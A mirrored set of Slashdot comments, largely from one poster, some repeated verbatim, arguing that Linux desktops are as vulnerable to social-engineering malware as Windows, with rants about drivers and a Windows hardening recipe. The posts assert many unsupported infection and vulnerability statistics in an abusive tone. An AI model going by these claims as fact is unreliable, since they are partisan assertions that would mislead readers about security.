Slashdot Mirror

Sigh....how to write a Linux virus in 5 easy steps using the same tricks malware uses, BTW wanna guess what kernel hosts the OS that has surpassed Windows in infections and has for over 5 years? That's right sparky LINUX.

So your vaunted "source" means absolutely nothing, its classic security by obscurity. wanna guess how much of your average Linux distro is actually vetted, as reported a couple years back by a scan of github access by a security firm? Less than 2%, that is all, the other 98% hadn't been touched by anybody but the authors who could have put any malware they wanted into it and you wouldn't know anymore than if you were on windows or OSX.

BTW I'll be happy to smack you with some citations if you'd like, from the KDELook bug that was hosted on all the major KDE repos for over a year to the Quake 3 malware that was hosted on all of the major repos for a year and a half, just ask. Thanks to Android we now have undeniable proof that Linux security is nothing but security by obscurity, and that if a malware vendor wants to own Linux? It gets pwned just as hard.

Sigh....how to write a Linux virus in 5 easy steps along with the follow up rebuttal that shows its actually easier than the author first thought, using NOTHING but the exact.same.tricks. used on Windows users. And please note we have already seen these kinds of tricks DO work on Linux users, the KDELook bug anyone? Or the infected Quake 3 that sat in a repo for nearly a year?

The moral of the story is this...there is no such thing as a secure OS if the user has control of the system because the user is frankly the easiest part of any system to exploit. think the PCs I see infected at the shop got that way from Windows exploits? Nope they ALL end up that way from a variation of the classic "dancing bunnies problem". You make your malware look like something the user really wants, user bypasses the security to get it, user gets pwned....what part of that required a specific OS? Oh yeah NONE because it has jack and squat to do with the OS, its exploiting the USER.

So hold on to that dream pal, the insane number of Android infections, which just FYI hit the million infected mark 3 times faster than Windows hit that milestone, has driven a stake through the lie that the Linux kernel somehow has magical anti-malware powers. You move say 10 million windows users to Linux so its a target worth hitting? it'll be pwned before the holiday weekend is over.

Sigh....how to write a Linux virus in 5 easy steps along with the follow up rebuttal that shows its actually easier than the author first thought, using NOTHING but the exact.same.tricks. used on Windows users. And please note we have already seen these kinds of tricks DO work on Linux users, the KDELook bug anyone? Or the infected Quake 3 that sat in a repo for nearly a year?

The moral of the story is this...there is no such thing as a secure OS if the user has control of the system because the user is frankly the easiest part of any system to exploit. think the PCs I see infected at the shop got that way from Windows exploits? Nope they ALL end up that way from a variation of the classic "dancing bunnies problem". You make your malware look like something the user really wants, user bypasses the security to get it, user gets pwned....what part of that required a specific OS? Oh yeah NONE because it has jack and squat to do with the OS, its exploiting the USER.

So hold on to that dream pal, the insane number of Android infections, which just FYI hit the million infected mark 3 times faster than Windows hit that milestone, has driven a stake through the lie that the Linux kernel somehow has magical anti-malware powers. You move say 10 million windows users to Linux so its a target worth hitting? it'll be pwned before the holiday weekend is over.

Which is what makes it a lot more dangerous. I'll just leave these here for your perusal. Oh and be sure to respond with a typical fanboy "but but but those don't count!" just like the Apple iHeads did when MacDefender came out and they went from "Apple doesn't get viruses" to "that doesn't count because its technically not a virus, its a trojan!" LOL.

Uhhh...you DID read TFA, yes? Its a browser based on Chromium and Chromium is cross platform so all they have to do is compile it for Linux and OSX. And if you think its hard to get an end user infected on Linux its actually surprisingly easy using the same way most malware is spread, social engineering. Remembeer the weakest link in ANY security system is always the user, doesn't matter what the OS is.

Uhhh...you DID read TFA, yes? Its a browser based on Chromium and Chromium is cross platform so all they have to do is compile it for Linux and OSX. And if you think its hard to get an end user infected on Linux its actually surprisingly easy using the same way most malware is spread, social engineering. Remembeer the weakest link in ANY security system is always the user, doesn't matter what the OS is.

And that makes it all moot, because the user is always the weakest link and malware doesn't need root to do the tasks most malware writers want your PC for.

As for how easy it really is? I'll just leave this here along with the the follow up which points out ways to make it even easier to infect Linux boxes.

And that makes it all moot, because the user is always the weakest link and malware doesn't need root to do the tasks most malware writers want your PC for.

As for how easy it really is? I'll just leave this here along with the the follow up which points out ways to make it even easier to infect Linux boxes.

Sigh...Linux has more vulnerabilities than Windows by 3 to 1 in 2014, Windows beats iOS, OSX, and Linux in least number of vulnerabilities in 2014, and how to write a Linux virus in 5 easy steps targeting the same weakness that more than 90% of malware target, the user...HAND.

So in other words....they are FOSSies and are doing it on religious grounds rather than on the merits of the OS or even its functionality?

In that case I agree with you 100%, because if they are getting viruses in 2014 then its because of PEBKAC and those same people will end up somebody's bitch on Linux so as a member of the Windows community allow me to say thank you, please keep them. Better they cause millions of Linux infections than cause Windows ones, thx!

For everybody else Windows 7 is solid as a rock, Windows 10 looks to be even nicer in every way, and with both you have to REALLY go out of your way to be a booger picking moron to get yourself infected, what with the sandboxing, ASLR,DEP,low rights mode, Windows Defender, auto updates, one has to be a real drooling idiot to get themselves infected...I should know, I run a PC repair shop and see quite a few and ya know what? Damned near every.single.one. says something along the lines of "I knew I shouldn't click and run that, I really did, I don't know why I did that"...well I do its the same reason the "How to write a Linux virus" works just fine (which it does BTW, see the KDELook bug for just one example) its called social engineering, which is how more than 95% of Windows bugs end up installed.

So I personally wish all the "virus carrying click on everything" types go to your OS, I really do. From the looks of the Android malware they will be happy to spread their STDs to your OS just as they did to ours, so please accept these plague bearers with our compliments!

how to write a Linux virus in 5 easy steps using the exact same tricks used to infect Windows. Say that is only hypothetical? How about some real world pwning like kernel.org and its not a fluke by any means. Oh and what happens when the "secure" Linux kernel gets used by a target worth hitting? A million plus infected systems that is what.

Linux "security" is security by obscurity, simple as that. The "many eyes" myth was proven false by Heartbleed which sat there for fricking years without being caught, the ONLY advantage having the source gets you is the ability to keep old versions alive after the devs move on....that's it,that's all. Hell by the time one was to do even a piss poor code audit of even a tenth of a single distro release it would have been abandoned for 5+ NEW releases that your audit wouldn't cover, see how Ubuntu is on track to have 20 mainstream releases in the same support window as Win 7 for example.

Source code isn't magic and considering how many thousands of people work on the code that goes into a single distro sticking a state actor in the mix would be trivial if the state desired it.

Oh please do you REALLY think that is the cause of Windows infections?

I got news for ya pal, I fix the systems that get pwned 6 days a week and I can tell ya that hasn't been even a major, much less main, source of infections since 2004 or so. How do Windows systems get infected? The same way this page shows you how to infect a Linux system in just 5 steps through good old fashioned social engineering. Here are the top sources of infections I see at the shop, I see these constantly..

1.- "You want to see teh hot lesbos? Just run 'Iz_Not_Viruz_Iz_Codex' to see teh hot lesbos today!" 2.- Hi, this is your (insert name of person they know whose system has been pwned) and I found something really cool! Just click this link (which goes to a page full of drive bys) to check it out!" 3.-ZOMFG u got teh viruz! Just run 'Iz_Not_Viruz_Iz_Cleanerz' to get rid of it ZOMFG!" 4.- "You are teh winrar of our contest! Just give us all your info on this page (so we can pull an ID theft while infecting you with drivebys) so you can get your prize u lucky dog!"

These work on ANY system because they target the weakest point, THE USER. As a matter of fact I've been seeing a sharp rise in infected Android smartphones and ID thefts from that last one. It seems that folks just can't equate one system to another so all those scams that haven't worked on a PC in a decade? Work great on a smartphone. Its endless September all over again. BTW please note that in NONE of those, nor in the Linux example does the OS matter because the weak spot hasn't been the OS in ages, the easy target has been and always will be the users.

Are Linux users? After all they are even more trivial to infect than Windows and Android, so beloved and claimed by the Linux community hit the 1 million infected mark last year, a full 9 years earlier than it took Windows to reach the same number BTW, so are they gonna pay or bugger off? Excuse me "go write a Bash script" would be the more apropos line.

Don't mistake security by obscurity for actual security as they are VERY different. The *BSDs with the constant code audits and insane amount of hoops required to put anything in mainline? That is REAL security, whereas with Linux...well let me put it THIS way, you have over 700 projects in your average distro which 1.- they never talk to each other, 2.- they are each "doing their own thing" without regard to what the others are doing, and 3.- they have ZERO care for anybody's project but their own, so if Torvalds futzes with the kernel and breaks the wireless subsystem? Too bad so sad.

The only reason Linux lasted as long as it did was less than 1% on the desktop. and don't waste your breath trotting out the "Linux runs on servers" TMRepo meme, as servers are stripped to the bone, running an OS that may as well be embedded for how little it has, and are managed by guys that spent many years studying to learn how to run servers securely. you give those same Linux admins a Windows server and they'll be just as secure, you can even have a headless server with only what you require installed thanks to WinServer Core.

So before you throw stones next time you might want to look at the glass house you are living in bud.

Flag on the field, 15 yard penalty for "magical thinking".

Would you too like to know how to write a Linux virus in 5 easy steps icebike? Its trivial and uses the exact. same. methods. that the Windows viruses use, in fact it would be quite trivial to make them cross platform! Oh but "that wouldn't work IRL" you say? Might want to tell that to the owners of all these infected Android systems. BTW please note the date of the second article, last figures I saw now had the number of infected over the million and a half mark but since I couldn't find a reliable source for those figures and didn't want anyone saying I'm picking facts I went with the older article.

Go ahead and try the first article for yourself icebike, you ARE running Linux, correct? It has step by step instructions and works just like the "KDE Look" bug that spread through the KDE community did a couple years ago. When you do and see that they infect the system just fine maybe then you'll accept that Linux security is security by obscurity and realize these companies buy windows FOR A REASON and its because you have one company to call that is in charge of the whole stack. Oh and don't bring up servers, those are stripped to the bone, have nothing running that is not absolutely required AND locked way the hell down. I can do the exact same with Windows embedded and NOT have to rewrite a couple hundred grand to a couple million in code to work on an OS that is unsupported unless I write big checks per unit to Red Hat.

Sorry icebike but no matter how you slice it? Your math don't work. if it did these banks would be happy to switch, think they have ANY loyalty to anybody but their own bottom lines? But just as al the retailers large and small refuse to carry your brand in house because they have found it wanting so too has the financial sector tried your OS and with the exception of a few server roles its been passed on.

Actually in some moist delicious irony Windows does NOT store the WiFi unencrypted, the last one that did was WinXP which was depreciated and is all but abandoned by MSFT, the rest? Store it in an encrypted XML file which the system and NOT the user has the keys for so the only way for them to get it would be to somehow corrupt the WiFi password file AND disconnect the session so the user would be forced to re-input the password while they were monitoring.

And it is very MUCH relevant as I was attempting to point out that a good 9 times out of 10 the weakest link is NOT the operating system, its the user. Apparently you didn't follow the narrative for whatever reason, so I will elaborate. See this how to write a Linux virus in 5 easy steps page? It works the exact same way that pretty much every current bit of malware on Windows, from the "free porn codec" to the security tool and FBI porn bug variants work and that is by fooling the user in order to get them help the malware writer past the defenses.

Go look at the top 10, hell the top 50 malware infections and guess what? They ALL work the same way, get the user to help lower the defenses. All TFA shows is that once a malware writer gets a Linux user to lower the defenses the system will be that much trivial to pwn, that's all. But at the end of the day the vaunted "Linux security" is worth a bucket of piss against the top 20 malware writers because they all know where the weakest link in the security chain, as those million Android infections show Linux security PEBKAC.

Except with it stored unecrypted they don't NEED physical access, they merely need you to follow a few simple instructions and download their "free codec" or similar trick.

Linux fanboys can scream bloody murder and waste modpoints but that won't change reality and reality is its almost never the OS that is the weakest link, its PEBKAC. Hell look at Windows from Vista on up, you have the user running as a user and requiring elevation for anything more than trivial changes (sound familiar?) and it goes even one better than Linux by having the browser by default run with the lowest possible privileges, yet systems STILL get pwned, why? PEBKAC.

Linux users, like the Mac users before them got away with not having to worry about such things thanks to security by obscurity, but just as MacDefender signaled the end of that perk in OSX so too has the million Android infections signaled the end of SBO for Linux. I've seen Linux machines pwned in a week (look up the "KDE Look" bug for just one example) and I've seen Win2K boxes go from RTM to EOL without a single bug because at the end of the day its not the OS, although storing passwords in plain text is just stupid, but ultimately whether a system is secure or not comes down to whether the user has common sense and follows best practices.

Remember folks no matter how hard you work to foolproof a system the world will always come up with a bigger fool.

Sorry, gotta throw a flag, bullshit on the field. if anything Linux (which the community is quick to claim Android as their own) is MORE vulnerable than Windows as Android has reached over a million infections a full decade faster than Windows reached that milestone BTW, and unlike Windows which has several damned good sandboxing antivirus packages, including some really good free ones, Google has made sure that antivirus on android is useless as they have no way to uninstall or even stop a malicious app.

Of course the whole thing just proves what many of us has been saying for years, that Linux is just as easy to infect if not more so than Windows and OSX and that once Linux gained any popularity, so that it was no longer benefiting from security by obscurity that it would pay the price. Oh and before anybody chimes in with the totally pointless tidbit about Linux servers? You see those are actually administered by these things called...wait for it..."server admins" that have had years of education and experience before being let loose on those systems. Linux benefited from security by obscurity in the consumer space because so few actually used it in that arena, Google ended that with android.

So ironically the act that Windows has functional sandboxing antivirus may actually help to keep these android systems from getting infected, instead of the other way around.

Not to mention have you SEEN the winners of the obfuscated C contest? the kind of guys that get jobs with the NSA frankly aren't THAT damned sloppy!

At the end of the day it really doesn't matter though, as we have seen with the Tor nodes being run by the NSA there is more than one way to skin the cat and anybody can write a Linux virus in 5 easy steps by simply targeting the same weak link as on Windows and OSX...the user. BTW anybody that doesn't think it would work should look up the "KDE Look Bug" that worked by using the classic trojan move of bundling malware with something the user wants, in that case a theme and screensaver for KDE.

So the moral of the story is there really is no need for the big bad to manage to hack the Linux kernel, or the Windows or OSX kernels, there are a million other ways to gain control of the system. Quick, show of hands, how many here have done a code audit on Libre Office? Firefox? What about all those little programs that end up in every distro, from the stylish digital clocks to the little googly eyes app? How many have done a serious security minded code audit on those? Just remember because something COULD have been done does NOT mean it HAS been done, after all someone could become a zombie but I really don't think I need to worry about the undead eating my brains, do you?

This is just a wake up call that NO OS is immune, no OS is magically free from zero days or attacks, that is magical thinking and ask all those OSX guys that got MacDefender and macGuardian bugs where magical thinking gets you.

Not only is it a myth you can show with basic common sense WHY its a myth.

You have something like 40 MILLION lines of code making up even the thinnest Linux distro, right? Now programs on average with FOSS have two to four releases a year, some like FF even higher.

Now for "many eyes" to be true ALL of what I'm about to post HAS to be true or many eyes is false...1.- you have to have people with the education and experience in both code AND stenography AND obfuscation, for why you have to have that look at the obfuscated C contest to see how even when you know there is malware how well it can be hidden, 2.- those people HAVE to look at not ONLY the code but ALSO all that it interacts with, for why you have to have that look at payload malware where by itself it is harmless but when mixed with a second program turns nasty, and finally 3.- They have to be willing to check not ONLY this one version but EVERY release for both the program AND the subsystems!

The "many eyes" myth works on the fallacy that states because something COULD be done it HAS been done. Well there COULD be vampires in the world but I don't think I need to carry a stake, do you? if I wanted I could wallpaper this page with Linux malware links but I think an even better answer is to show how you can write a Linux virus in 5 easy steps which will work on pretty much ANY distro, how? By exploiting the weakest link, like any virus...the user. And for those that Linux users wouldn't fall for those? look up the "KDE Look Bug" to see thousands of Linux users that got pwned by a screensaver and theme.

The same can be said of Windows except you'd be opening it up to malware and guess what? The same applies to Linux. How fricking sad is it that you will sit here with a straight face and tell me i should leave my users vulnerable with a badly out of date OS? And you HAVE to do the forced upgrade deathmarch because Linux don't support previous versions for shit because "Hey its free!" well so is that dogshit in the park but I don't want to be handling it either.

At the end of the day there is a reason why more people risk hefty fines and in some regions even jail time to steal the competitor's product than take yours for free by several orders of magnitude and that is because Torvalds is a shitty developer who refuses to let go of a broken driver model he ripped off of UNIX in 1993. I mean can you imagine how much you'd be laughing if Windows kept the creaking and buggy as fuck .VXD driver model in 2013? that shit would be hilarious, right? Well that is EXACTLY WHAT TORVALDS HAS DONE by keeping the ancient fucked up POS dependency hell breaks constantly "let the devs do it" driver model which in the end leaves you with shit like this, with drivers that are half assed, piss poor, and break often.

Again feel free to take the Hairyfeet Challenge and try for yourself and see if 1 or more drivers aren't completely trashed by the end. For extra points try it on a laptop and see how quickly Linux shits all over the wireless. the Hairyfeet Challenge actually rigs things in Linux' favor by asking for only HALF the support Windows gets and on top of that I didn't even use anything exotic, we are talking boring bog standard hardware that is in a good 90% of the desktops and laptops and it STILL shit all over itself. If the Linux community wanted to pay me for the bandwidth and time I'd be happy to film it live but frankly the challenge is so easy to replicate at home that anybody can do it, all you need is a bog standard desktop or laptop and a copy of whatever distro you want to test from 5 years ago which you will then upgrade/date to current through the GUI as Joe and Jane Normal would be expected to do.

At the end of the day the Linux driver model is deep fried tampons and as long as Torvalds is in the big chair it will stay that way because he is old and cares more about "purity of essence" than having a functional OS. Hell even basic common sense will illustrate that the math don't work when it comes to drivers, when Torvalds adopted that driver model you could fit every Linux driver on a single floppy, now you have over 100,000 drivers, hundreds of new drivers released each month and MAYBE 300 devs (I'm pretty sure it isn't even half that, just giving Torvalds the benefit of the doubt) that are qualified to do low level driver debug and testing. If you mainlined pure coke into their veins and kept them working 24/7 then you would MAYBE have each driver looked at once every 6 years MAYBE.

There is a reason why every B&M shop that has tried Linux has dropped it, from little shops like mine to giants like Walmart, why simply shopping for devices to use with Linux quickly becomes a game of hardware roulette and why drivers get shit on constantly when you update/grade and that is because the driver model just doesn't work. But when you get any of the devs on here the only explanation you get is either Torvalds "It wouldn't let me just tweak whatever I want at any time" (yeah jackass, that is kinda the damned point, to keep you from breaking shit) or worse that kernel dev who said, I swear to God, that "I hope every non free driver breaks often!". Yeah because users don't want functional hardware, all they care about is the racial purity of the GPL. BTW in a case of irony moist and delicious what does every forum tell you to buy for video? Nvidia because their proprietary drivers actually fucking work!

After nearly 5 ye

http://www.unixmen.com/meet-linux-viruses/

http://www.internetnews.com/dev-news/article.php/3601946/Linux+Malware+On+The+Rise.htm

http://www.geekzone.co.nz/foobar/6229

http://www.slideshare.net/kumar_sunil/is-linux-operating-system-virus-free

want more i have tons more

Note that Linux desktop was not free of stupid features either:
http://www.geekzone.co.nz/foobar/6229

Do I REALLY need to wallpaper this page with articles about Linux malware? Or point out how to write a Linux virus in 5 easy steps again?

And if you are gonna talk about me at LEAST get the facts right, I have said time and time again that Linux is great on servers, its great on embedded, where it sucks royally is the desktop. And if he isn't a novice then WTF is that Ask Slashdot anyway? if he wasn't a novice he'd know enough basic troubleshooting to figure this out on his own, but if you read TFS its pretty damned obvious his idea of "not a novice" is that he can install the OS, otherwise we wouldn't even be having this conversation.

But no matter what you, I or anybody else thinks about Linux the simple fact of the matter is this is NOT the right place for this question, it should be in the forums where they can ask follow ups and work their way through the problem, all he is gonna get here is wild guesses at best. This isn't one of those ask /. questions where you can just say "Oh do this" or "oh you need" that to solve it, its gonna take some back and forth to get to the root of the problem.

A KDE file launcher script ... link

First of all a public service announcement: To everyone that writes "M$" in 2013...This...Is...YOU! and this is what everyone sees and instantly dismisses when you write that lame ass M$ in 2013. You could write the most brilliant post in the history of Slashdot but a good 80%+ will NEVER read it because they see M$ and think "douchebag" and move on. So don't waste your time unless you want people posting your group photo as the very next post.

Second of all lets get something VERY clear for those that don't seem to understand how these things work, okay? ALL OPERATING SYSTEMS that would be what we consider "modern" are some of the most complex pieces of software EVER written, we are talking millions of LOC in the kernel alone and thousands of little sub-programs that ALL have to work in concert to give the user the illusion that its all one program that "just works". Is Linux even close to immune? Not only is that a big NO but to even suggest it is is a symptom of what is known as "magical thinking" such as "If you buy (product X) then you will magically be safe!". We in IT have seen magical thinking used to sell everything from OSes to firewalls to routers and reality will blow holes in that lie every single time.

So if Linux is vulnerable why don't we see Linux attacks in the news? We do only they are called "Android attacks" and in fact its predicted that later in the year Android will reach the one million infected mark which considering that Android isn't even a decade old is pretty impressive.

Look its actually VERY simple, and evidence has bore this out time and time again. Criminals ARE LAZY and want to do the least amount of work for the biggest bang so they want to go after the biggest targets to yield the most infections they possibly can. I mean writing a OS/2 virus today would probably be the most trivial thing in the world yet you don't see anybody doing it, why? Because the fact is even though eComstation still sells OS/2 there are too few using it to make it a juicy target. But the malware writers WILL go where the targets are, used to be it was always Windows, then Vista bombs and everyone in the press starts talking about how Mac adoption is climbing, what happens? Mac Guardian and Mac Defender. Android phones and tablets explode in usage, what happens? Thousands of Android malware released weekly.

So anybody who thinks their OS is gonna magically protect them from malware because "(product X) doesn't get bugs!" is merely deluding themselves with magical thinking. There are even articles that helpfully helpfully explain this and point out how switching platforms just for the sake of magical thinking (in the article OSX for Linux but you can insert any from and to in there and it still fits) just doesn't work. Be it Linux, Mac, or Windows you can find plenty of bugs, I could spend 5 minutes and cover this page in reports of bugs for all 3, I already listed the 2 biggest Mac bugs of recent memory, TFA is a Windows bug, and just off the top of my head there was the KDELook theme bug and the infected Quake 3 that was served up by most repos for a year and a half on Linux. NO OS is safe, NO OS is immune, and if you are gonna claim security by obscurity is actual security you might as well run Win95 or BeOS because hey, there aren't any bugs circulating targeting those OSes either.

Well considering the how to write a Linux virus in 5 easy steps article uses Python and when I search for "Python malware" I get over 600,000 hits? There is probably plenty of Python malware already out there, it just doesn't get as much press as a Windows bug as it has a smaller target. But as long as there is the potential to make money on infected machines I'm sure that somebody will be targeting just about every combo of language and OS you can think of, no OS is immune to a targeted attack.

Now that said I have to deal with some customers that are...sigh...can you say "click happy" and clueless? So after many hours of trying various combos on test boxes here at the shop I have come up with what I call my "foolproof Windows for fools" that makes the machines as solid as tanks and cuts the living hell out of the risk of malware. basically short of them going "Why yes, please infect my machine" which sadly I have had to deal with at least once, well short of them going the extra mile to be super stupid you'll have a system that short of hardware failure won't be going anywhere. For those that want to know how, recipe is as follows:

1.-First make sure their software is all up to date and Windows is set to automatically download and install patches, otherwise they are likely to just ignore the patches and leave the machine vulnerable.

2.- Get a low rights mode browser with ABP, any Chromium based will do but I use Comodo Dragon as it has privalert which will block all the tracking crap and you can choose to use Comodo Secure DNS in the browser only, this helps to block a LOT of infected websites from loading in the first place.

3.- For an AV I recommend either Avast Free or Comodo IS, both have their pluses. Avast AV is a little more "chatty" about what its doing and I found some folks really like that, Comodo IS has built in sandboxing and is easy to configure for the actual user, so its really up to you as both are quite good at stopping malware.

4.- Install FileHippo Update Checker and have it set to run at startup, it only uses a couple hundred KB of memory and will tell them when their third party software is out of date as well as provide links to the software, this keeps them from downloading "flash updates" and other dubious software updates. if the Hippo doesn't say it needs updating then it don't need updating.

5.-Finally you need to have a hidden backup and restore partition, just in case they ever manage to figure a way to get infected or if a family member comes over and trashes things. I am testing Paragon Drive backup for this roll but since I haven't finished testing I'd have to go with Comodo Time Machine but be aware its no longer supported and I don't think its been tested with Windows 8. That said the nice thing here is you can lock a snapshot with everything set up and all the third party software loaded so you have your own "OEM restore partition" without the trialware crap and it can also create snapshots on a schedule and be accessed if the machine can't even boot to desktop by just pushing the Home key. this way if they manage to somehow seriously screw up the OS a single push of the Home key and 20 minutes later they are back up and running.

With these 5 little steps that takes less than an hour all told you will have a machine you can let the most clueless users get a hold of and not have to worry about them borking the system I have several "click happy" customers that have been on this system for over 2 years now and not a single bug, runs just as good as when I handed it to them. In fact I have only had to help one that has been on this system, she forgot to log off and her 16 year old niece got on after she left and did God knows what to the system so it wouldn't boot to desktop. 15 minu

And you don't even have the balls to make an account so why should anybody listen to you? Oh and here is How to write a Linux virus in 5 easy steps but you hang onto that "magical thinking" because it sure did protect all those Apple users from the non existent MacDefender and MacGuardian...oh wait. Well it at least protected all those android users because of the excellent Linux kernel protecting them...oh wait.

NEWS FLASH: there is NO SUCH THING as an OS that doesn't have bugs and vulnerabilities, which is why you airgap sensitive systems. All your "solution" does is use security by obscruity alongside a truly shitastic ecosystem where a billion devs "do their own thing" and make changes for the sake of change, make things incompatible for no damned reason other than they can, and where the kernel on up is like the shifting sand with ZERO QA or QC so the driver that works now probably won't work when the 6 month upgrade deathmarch comes. Hell even one of the Red Hat Devs says the current desktop is shit, and you wanna hoist it off on somebody who is barely able to use a PC? Yeah maybe if he hates his dad's guts and wants to see him suffer maybe. After all a broken machine is 100% virus proof as well, not gonna be very useful though.

If you think Linux has a magical immunity you might want to read how to write a Linux virus in 5 easy steps which shows with just a little social engineering its really not hard to target Linux just as the malware writers target Windows and OSX now.

From the article you mention:

A step that could be taken by the Gnome and KDE developers: Require launchers to have execute permissions. A saved attachment won't have those. Therefore, even though a syntactically correct and properly named launcher was dropped on the desktop a user can't just click on it and start it if the execute bit is not set.

Done. Modern versions of KDE need launcher to have execute permission. That hole is patched.

And nobody pretends that Linux has some magically imunity to viruses. As a Unix-like OS it just follows a few key principles :
- don't blindly execute everything. require executable to be explicitely marked as such (thus any shit downloaded from the web or from e-mail won't automatically be launchable).
- don't run constantly as root. thus the amount of harm that a program can do is limited to the access rights of a user. (While this still makes it possible to send spam, mine the data of the user, and modify the user profile, at least it prevents further deeper compromising of the running system).
That doesn't magically solve all malware problems in the universe. But at least it makes the life of malware writer a little bit more complicated. And the 5-step virus relies on a work-around of the first rule. Which has been since then corrected.

Back then, this no-brainer principles were NOT followed by Windows XP, making it even easier to write worms spreading over e-mail. Thankfully, since then Vista has arrived and has brought UAC dialogs in these situations (now how much dialogs can help security problems when the users are used to "okay" click on everything, that remains to be seen).

Or did you think android runs on Windows?

Android is a completely different beast and instead of unix-like userland it uses it's very own userland (a Java-like system).
Though it too doesn't allow execution of arbitrary e-mail attachment too. It's not impossible to write android malware, even malware that finds a way to look legitimate to android's capability system.

But at least the scenario "Here are some pics of hot lesbian teens! Click on the attachment to view them!" doesn't work on modern OSes. Except windows (and that's until WinXP, starting from Vista, you get an UAC dialog telling you that you run an executable from an untrusted source - now how many idiots will click on "okay" anyway is a different story).

Despite you "Windoze" comment frankly it wouldn't matter what OS you are running because when you are dealing with a targeted attack such as this the enemy knows what you have and therefor can simply tune the attack to the OS, just as we saw with stuxnet.

If you think Linux has a magical immunity you might want to read how to write a Linux virus in 5 easy steps which shows with just a little social engineering its really not hard to target Linux just as the malware writers target Windows and OSX now. Or did you think android runs on Windows? In the end if you know what your target is running you can simply shape the payload to target that infrastructure, its really not that hard to do.

I wonder what they have that the malware guys figured it was worth the expense of such a targeted attack? perhaps a rival corp wanting to get ahead of the game? it would be interesting to see where this all leads, as you usually don't hear of malware writers going to this much trouble for a single target, so whatever they have must be worth a lot to someone.

Know what is sad? i won't do it, since you seem to be trying to answer honestly but every. single. answer. you put is actually a TM on TMRepo. that means its the same lines that have been used so damned often they actually wrote them down with a cute title so you could just paste the numbers. yet linux is STILL less than 3%, the numbers say more than i ever could, as will this link that in turn has over 100 links pointing out exactly what i was just saying complete with makes and models.

So either you are magical, able to sprinkle fairy dust onto the machine, or your memory helpfully forgets bullshit. because frankly the ONLY machine I've EVER seen pass the hairyfeet challenge was a 733MHz Intel box which i promptly threw away because it was too damned old to even get a dollar for. Everything with hardware anybody would want? Or with a decent GPU? or sound? Crapped all over itself.

In the end "Linux is a replacement for Windows!" is a damned lie, its a replacement for a Hackentosh which is a MUCH MUCH smaller niche, and like a Hackentosh you damned well better be picky as fuck with the hardware and no damned well about each brand and be ready to do some hacking, something windows users haven't needed to do in over a decade. In fact if i were to compare Linux to Windows I'd say its right now barely at Win98 but of course that isn't what you want to hear, but think about it. What was Win98? it was a CLI OS with a bolted on GUI which was a second class citizen that wasn't even required, it was buggy and flaky and CLI was often needed to really get anything done or to fix problems. what is Linux? it is a CLI OS with a bolted on GUI which is a second class citizen that isn't even required, it is buggy and flaky and CLI is often needed to really get anything done or to fix problems.

Oh and I don't know what magical place you live at friend but most B&M stores don't like to take open merch, often charge a restocking fee, and have a set number of returns per year. So using your logic frankly it wouldn't take but 1 or 2 stuck with devices to make Linux equal MORE than the cost of Windows. that is why i personally won't have a Linux machine in my shop, a single broken driver will cost more of my time that a Windows 7 HP OEM. BTW Best Buy, Asus, Walmart, what do these 3 have in common? ALL USED to carry linux and NONE carry it now, why? Because just as i said the support costs ate any savings by not paying for Windows. I'm sure you haven't used Windows since XP but frankly since Vista the only bugs I've seen have been PEBKAC which Linux doesn't give you a degree in CompSci by running it friend. Oh and if you think Linux is immune from bugs? There was an infected Quake 3 in the repos for a year and a half with NOBODY catching it, KDELook handed out infected screensavers for ages with nobody catching on, these are just two off the top of my head. look at how simple it is to write a Linux bug. as we saw with Android if anybody gave a crap or if Linux had any real numbers there would be just as many Linux bugs as there would be Windows ones, sorry.

The reason why you don't see Linux desktops getting targeted is for multiple reasons, 1.-interoperability is shit, the lack of a unified platform that keeps third parties from touching Linux with a 50 foot pole also keeps away malware writers because the best they could score is say...40% of UBUNTU users, but that same attack probably wouldn't work on RHEL without serious tweaking, or on PCLOS, or on Mepis, you get the picture, 2.- Malware writers want powerful machines because the more powerful the machine the more they can remain hidden while cranking out the spam or spreading the bug. Not to slam Linux users but you DO have a shitload of "How to save that PC from the dump" articles which would give an outsider the impression they are more likely to find a P4 than an i7, and 3.-Malware writers are criminals and criminals are notorious for being lazy. they don't want to have to constantly rewrite their bug because something got fiddled with between Ubuntu maniac monkey and nutty narwhal and their shit got broke. With both Windows and Apple having quite clearly labeled life cycles this makes it easy to know how long a bug could be good for.

If you want to see how badly Linux would get pwned if it was on the radar simply look at android. it has tons of ordinary users, is using the Linux kernel, and has been royally assraped by the malware guys. in the end you simply cannot defeat reality which is thus: ALL Operating Systems are EXTREMELY complex, with literally millions of lines of code all having to interact perfectly and this isn't even counting the third party stuff. hell I doubt even Linus can tell you with 100% certainty when you launch say network manager every single call it will make and what every interaction is, its simply too complex. More than 90% of the planet are NOT geeks, hell they don't even come up to the level of a power user of any system, they know just enough to get it to function and that is it, and finally the malware guys figured out long ago its the USER that is the juiciest target, after all it is they that have the keys to the kingdom so by using social engineering they have become quite adept at getting past the defenses by having their "man/woman on the inside" aka the user, help them achieve their goals.

So it doesn't matter what OS you use, you practice safe computing you'll be fine, practice stupid computing you'll be pwned. For those that think the repos are safe might want to look at how long the repos were handing out an infected Quake 3, try a year and a half. If a malware writer truly wants to target Linux there are ways, target some of the software that isn't as heavily monitored or like I said simply target the users and you're in like flynn.

Now you watch as I get modded down for pointing out reality, to be followed by those that treat Linux as a religion (Some call them Freetards, I call them FOSSies because they remind me of Moonies) scream that it just isn't possible, that linux's magical goodness could never be tainted by malware crap...hmmm...where did I hear that before? Oh yeah those that bowed at the altar of Jobs, aka "The Cult of Mac". Wouldn't it be smarter to simply use the best tool for the job and be on your guard? But those that treat tech like ballclubs won't quit rooting for the home team, even when they strike out.

Hell you don't even have to give them ANYTHING to have them screw themselves, all you have to do is offer the illusion of giving them something. Its called the dancing bunnies problem and working PC sales and repair i've seen it more times than many here have had hot meals. People will give away their passwords, run ANY program, bypass ANY security, all you have to do is offer the right dancing bunny.

Sadly the only time i had to get ugly with a customer (I threw him out of the shop and told him I'd call the cops if he came back) was a customer that demanded that I repair his machine for free because he refused to listen and destroyed his system for a dancing bunny. Now with my little system I have for Win 7 I have had zero infected machines EXCEPT this guy, and I had told him before i ever sold him the machine when he asked about it "I can't give you that program because it doesn't exist anymore, the feds shut down limewire years ago and anything that says its limewire is just a virus" so what did he do? he Googled "The new limewire" the very second he got home and when both the AV AND the browser blocked him trying to get it he first uninstalled the browser then when he couldn't disable the AV he uninstalled it, all for the lure of a program that didn't exist. of course when he ran "the new limewire" what he got was over 100 malware infections and so many clickjackers that he couldn't even see the desktop for the constant stream of popups. when i finally threw him out the shop he was yelling "It says right there its the new limewire so make it work dammit!"

